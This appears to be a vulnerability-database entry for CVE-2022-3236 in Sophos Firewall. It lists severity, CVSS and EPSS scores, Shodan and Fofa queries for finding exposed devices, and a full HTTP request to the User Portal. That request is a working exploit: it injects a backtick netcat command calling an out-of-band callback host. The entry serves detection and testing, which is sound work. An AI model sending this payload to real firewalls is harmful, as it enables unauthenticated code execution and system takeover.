| Title | Sophos Firewall <= 19.0 MR1 - Remote Code Execution |
|---|---|
| Author | daffainfo |
| Severity | Critical |
| Impact | Remote attackers can execute arbitrary code on the system, potentially leading to full system compromise. |
| Remediation | Update to the latest version of Sophos Firewall. |
| CVSS Score | 9.8 |
| EPSS Score | 0.93105 |
| CVE ID | CVE-2022-3236 |
| CWE ID | CWE-94 |
| Shodan Query | http.title:"Sophos" |
| Fofa Query | title="sophos" |
| Tags | cve cve2022 sophos firewall rce intrusive oast kev vkev |
Sophos Firewall version v19.0 MR1 and older is vulnerable to code injection in the User Portal and Webadmin, allowing a remote unauthenticated attacker to execute arbitrary code.
POST /userportal/Controller HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15
Connection: close
Content-Length: 322
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
mode=451&json=%7b%22username%22%3a%22admin%22%2c%22password%22%3a%22x%22%2c%22languageid%22%3a%221%22%2c%22browser%22%3a%22Firefox_91%22%2c%22_discriminator%22%3a%7b%22curvalue%22%3a%22%3b%60nc%20d6dtg49le0o6d75mr0og3e47rzo5orpom.oast.live%2080%60%22%7d%2c%22value%22%3a%22curvalue%22%7d&__RequestType=ajax&t=1710331582506
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-3236.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-3236.pcap
N/AN/A